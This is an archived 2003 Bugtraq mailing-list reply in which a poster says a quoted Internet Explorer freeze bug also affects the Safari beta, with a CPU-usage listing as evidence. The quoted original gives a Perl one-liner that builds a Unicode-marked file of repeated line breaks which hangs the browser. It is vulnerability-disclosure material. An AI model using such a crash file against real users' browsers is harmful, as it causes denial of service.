[29984] in bugtraq
Re: April appeared to be a month of IE bugs. Here's another one.
daemon@ATHENA.MIT.EDU (Cove Schneider)
Thu May 1 16:19:11 2003
Date: Tue, 29 Apr 2003 12:59:21 -0700
Content-Type: text/plain; charset=US-ASCII; format=flowed
Mime-Version: 1.0 (Apple Message framework v552)
From: Cove Schneider <cove@wildpackets.com>
To: <bugtraq@securityfocus.com>
Content-Transfer-Encoding: 7bit
In-Reply-To: <000501c30e7c$71165b50$9801a8c0@nobody>
Message-Id: <11A455E6-7A7D-11D7-9140-000393941C60@wildpackets.com>
Apple's Safari browser appears to be effected too....
Safari 1.0 Beta 2 (v73)
PID COMMAND %CPU TIME #TH #PRTS #MREGS RPRVT RSHRD RSIZE
VSIZE
3249 Safari 94.2% 0:07.20 4 108 288 5.40M 23.1M 14.7M
130M
On Tuesday, April 29, 2003, at 11:23 AM, ERRor wrote:
> Hello, Bugtraq.
>
> Malicious htm file can freeze IE with 100% CPU usage:
> Construct the file freeze.htm:
> c:\>perl -e "print qq'\xFF\xFE'; print qq'\r\n' x 30000" > freeze.htm
>
> After opening freeze.htm IE will hang with 100% CPU usage until
> IEXPLORE.EXE
> process is not killed. Two bytes (0xff 0xfe) at the beginning of the
> file
> mean that
> the encoding is unicode. So the internal unicode representation of the
> CR LF
> sequence
> will look like 0D0A0D0A but not 000D000A (if the file was a plain
> ASCII).
> Tested on IE 6.0 with all fixes, i think other versions also
> vulnerable.
>
>
> Best Regards, ERRor, dHtm.
> P.S. greets to .einstein. and dHtm
>